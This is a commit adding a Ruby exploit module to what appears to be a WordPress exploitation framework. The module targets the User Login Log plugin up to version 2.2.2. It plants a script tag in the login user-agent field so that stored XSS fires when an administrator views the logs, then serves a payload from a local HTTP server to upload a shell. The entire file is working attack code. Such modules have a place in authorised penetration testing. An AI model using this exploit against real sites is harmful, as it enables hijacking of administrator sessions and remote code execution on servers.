Add User Login Log <= 2.2.2 stored XSS shell upload

rastating · rastating · commit 02943234beb2 · 2017-03-04T19:50:37.000Z
diff --git a/modules/exploits/user_login_log_authenticated_stored_xss_shell_upload.rb b/modules/exploits/user_login_log_authenticated_stored_xss_shell_upload.rb
@@ -0,0 +1,40 @@
+class Wpxf::Exploit::UserLoginLogXssShellUpload < Wpxf::Module
+  include Wpxf::WordPress::Xss
+
+  def initialize
+    super
+
+    update_info(
+      name: 'User Login Log <= 2.2.2 Authenticated Stored XSS Shell Upload',
+      author: [
+        'Axel Koolhaas',                  # Disclosure
+        'Rob Carr <rob[at]rastating.com>' # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8751'],
+        ['URL', 'https://sumofpwn.nl/advisory/2016/stored_cross_site_scripting_vulnerability_in_user_login_log_wordpress_plugin.html']
+      ],
+      date: 'Mar 02 2017'
+    )
+  end
+
+  def check
+    check_plugin_version_from_readme('user-login-log', '2.2.3')
+  end
+
+  def requires_authentication
+    true
+  end
+
+  def run
+    scoped_option_change 'user_agent', "<script>#{xss_ascii_encoded_include_script}</script>" do
+      emit_info 'Storing script...'
+      return false unless super
+    end
+
+    emit_success 'Script stored and will be executed when a user views the login logs.'
+    start_http_server
+
+    xss_shell_success
+  end
+end
